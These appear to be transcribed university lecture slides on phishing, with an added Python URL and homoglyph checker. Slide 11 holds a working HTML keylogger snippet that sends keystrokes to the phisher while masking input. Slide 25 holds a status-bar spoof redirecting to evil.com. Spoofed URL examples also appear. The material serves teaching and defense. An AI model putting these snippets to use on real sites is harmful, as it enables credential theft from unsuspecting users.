Slide 1: Phishing
CS 361S, Vitaly Shmatikov

Slide 2: $1,500,000,000
Global losses from phishing in 2012 estimated at $1.5 Billion
Source: RSA Fraud Report

Slide 3: MillerSmiles.co.uk (image only)

Slide 4: A Snapshot of My Mailbox (image only; sender shown as [email protected])

Slide 5: A Closer Look
From: “Wells Fargo” <[email protected]>
    <a target="_blank" href="http://www.members.axion.net/~rod/.Wells.Fargo.com">https://online.wellsfargo.com/signon?LOB=CONS</a>
What you’ll see on the page: the link text, https://online.wellsfargo.com/signon?LOB=CONS
Where the link actually goes: the href, http://www.members.axion.net/~rod/.Wells.Fargo.com

Slide 6: And You End Up Here (image only)

Slide 7: Thank Goodness for IE (image only)

Slide 8: Typical Properties of Spoofed Sites
Show logos found on the honest site
• Copied image files or links to the honest site
Have suspicious URLs
Ask for user input
• Debit card number, SSN, mother’s maiden name, …
HTML copied from the honest site
• May contain links to the honest site
• May contain revealing mistakes
Short-lived (cannot effectively blacklist)
• Often hosted on compromised zombie machines

Slide 9: A Typical Phishing Page (image only)
• Weird URL
• http instead of https

Slide 10: Phishing Techniques
Use confusing URLs
• http://gadula.net/.Wells.Fargo.com/signin.html
Use URL with multiple redirection
• http://www.chase.com/url.php?url="http://phish.com"
Host phishing sites on botnet zombies
• Move from bot to bot using dynamic DNS
Pharming
• Poison DNS tables so that the address typed by the victim (e.g., www.paypal.com) points to the phishing site
• URL checking doesn’t help!

Slide 11: Trusted Input Path Problem
Users are easily tricked into entering passwords into insecure non-password fields
    <input type="text" name="spoof"
           onKeyPress="(new Image()).src = 'keylogger.php?key=' + String.fromCharCode(event.keyCode);
                       event.keyCode = 183;">
Callouts on the slide: the (new Image()).src assignment sends the keystroke to the phisher; event.keyCode = 183 changes the displayed character to *

Slide 12: Social Engineering Tricks
Create a bank page advertising an interest rate slightly higher than any real bank; ask users for their credentials to initiate a money transfer
• Some victims provided their bank account numbers to “Flintstone National Bank” of “Bedrock, Colorado”
Exploit social relationships
• Spoof an email from a Facebook friend
• In a West Point experiment, 80% of cadets were deceived into following an embedded link regarding their grade report from a fictitious colonel

Slide 13: Facebook Phishing (January 2012)
Attack steals Facebook credentials
Changes the profile picture of the compromised account to [image] and the name to “Fącebooƙ Şecurițy”
• Notice anything?
Sends a message to all contacts: [screenshot]
http://www.securelist.com/en/blog/208193325/Facebook_Security_Phishing_Attack_In_The_Wild

Slide 14: “Payment Verification” (image only)
http://www.securelist.com/en/blog/208193325/Facebook_Security_Phishing_Attack_In_The_Wild

Slide 15: Experiments at Indiana U. (2006)
Reconstructed the social network by crawling sites like Facebook, MySpace, LinkedIn
Sent 921 Indiana University students a spoofed email that appeared to come from their friend
Email redirected to a spoofed site inviting the user to enter his/her secure university credentials
• Domain name clearly distinct from indiana.edu
72% of students entered their real credentials into the spoofed site (most within first 12 hrs)
• Males more likely to do this if email is from a female
[Jagatic et al.]

Slide 16: Who Are The Biggest Suckers? (chart)
[Jagatic et al.]

Slide 17: Seven Stages of Grief [according to Elisabeth Kübler-Ross]
• Shock or disbelief
• Denial
• Bargaining
• Guilt
• Anger
• Depression
• Acceptance

Slide 18: Victims’ Reactions (1)
Anger
• Subjects called the experiment unethical, inappropriate, illegal, unprofessional, fraudulent, self-serving, useless
• They called for the researchers conducting the study to be fired, prosecuted, expelled, or reprimanded
Denial
• No posted comments included an admission that the writer had fallen victim to the attack
• Many posts stated that the poster did not and would never fall for such an attack, and that they were speaking on behalf of friends who had been phished
[Jagatic et al.]

Slide 19: Victims’ Reactions (2)
Misunderstanding
• Many subjects were convinced that the experimenters hacked into their email accounts; they believed it was the only possible explanation for the spoofed messages
Underestimation of privacy risks
• Many subjects didn’t understand how the researchers obtained information about their friends, and assumed that the researchers had accessed their address books
• Others, understanding that the information was mined from social network sites, objected that their privacy had been violated by the researchers who accessed the information that they had posted online
[Jagatic et al.]

Slides 20–23: Safe to Type Your Password? (four image-only slides)

Slide 24: Picture-in-Picture Attacks (image only)
Trained users are more likely to fall victim to this!
Slide 25: Status Bar Is Trivially Spoofable
    <a href="http://www.paypal.com/" onclick="this.href = 'http://www.evil.com/';">PayPal</a>

Slide 26: Site Defense #1: PassMark / SiteKey
If you don’t recognize your personalized SiteKey, don’t enter your Passcode

Slide 27: Site Defense #2: PIN Guard
Use your mouse to click the number, or use your keyboard to type the letters

Slide 28: Site Defense #2A: Scramble Pad
Enter access code by typing letters from the randomly generated Scramble Pad

Slide 29: Site Defense #3: Virtual Keyboard
Use your mouse to select characters from the virtual keyboard

Slide 30: Site Defense #4: Bharosa Slider
On first login, the user picks a symbol. On subsequent logins all letters and numbers in the PIN must be chosen using the correct symbol.

Slide 31: Anti-Phishing Features in IE7 (image only)

Slide 32: Are Phishing Warnings Effective?
CMU study of 60 users
Asked to make eBay and Amazon purchases
All were sent phishing messages in addition to the real purchase confirmations
Goal: compare active and passive warnings
• Passive (IE): address bar changes color, pop-up box tells the user that the site is suspicious
• Active (IE): full-screen warning, must click on “Continue to this website (not recommended)” to get to the site
• Active (Firefox): “Reported Web forgery” dialog, must click on “Ignore this warning” to get to the site
[Egelman et al.]

Slide 33: Active warnings significantly more effective (chart)
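Browser warnings like the ones in the CMU study rest on heuristics, and as an added example (not code from the lecture) the Python below checks a URL for the tricks listed on the Phishing Techniques slide (brand name buried in the path, plain http, a redirect parameter carrying a second URL) and folds the accented lookalike letters of the “Fącebooƙ Şecurițy” name from the Facebook slide back to ASCII. The brand table and the confusables map are constructed for this example, and the registrable-domain rule is a deliberate simplification.

```python
import re
import unicodedata
from urllib.parse import urlparse, parse_qs

# Brand -> the only registrable domain where that brand name belongs (constructed list)
KNOWN_BRANDS = {"wellsfargo": "wellsfargo.com", "paypal": "paypal.com",
                "chase": "chase.com", "facebook": "facebook.com"}
# Lookalike letters that NFKD does not decompose (constructed, deliberately tiny)
CONFUSABLES = {"\u0199": "k"}   # LATIN SMALL LETTER K WITH HOOK, as in "Fącebooƙ"


def skeleton(text):
    """ASCII-leaning skeleton: split off accents, drop combining marks, map confusables."""
    decomposed = unicodedata.normalize("NFKD", text)
    return "".join(CONFUSABLES.get(ch, ch) for ch in decomposed
                   if not unicodedata.combining(ch))

def impersonates(display_name, brand_name):
    """True when a name matches the brand only after homoglyph folding."""
    return (display_name != brand_name
            and skeleton(display_name).lower() == brand_name.lower())

def registrable_domain(host):
    # Naive last-two-labels rule; real code should consult the public-suffix list
    return ".".join(host.lower().split(".")[-2:])

def suspicious_reasons(url):
    """Warning signs from the slides found in url; an empty list means none found."""
    reasons = []
    p = urlparse(url)
    host = (p.hostname or "").lower()
    if p.scheme != "https":
        reasons.append("not https")
    if any(ord(ch) > 127 for ch in host):
        reasons.append("non-ascii host")
    # Brand string anywhere in host+path (dots removed, so ".Wells.Fargo.com"
    # still matches) while the registrable domain belongs to someone else
    flat = (host + p.path).lower().replace(".", "")
    for brand, domain in KNOWN_BRANDS.items():
        if brand in flat and registrable_domain(host) != domain:
            reasons.append(f"brand {brand} outside {domain}")
    # A query parameter holding a whole URL is the redirection trick
    for values in parse_qs(p.query).values():
        for value in values:
            value = value.strip("\"'\u201c\u201d")
            if re.match(r"https?://", value):
                reasons.append("redirects to " + (urlparse(value).hostname or "?"))
    return reasons
```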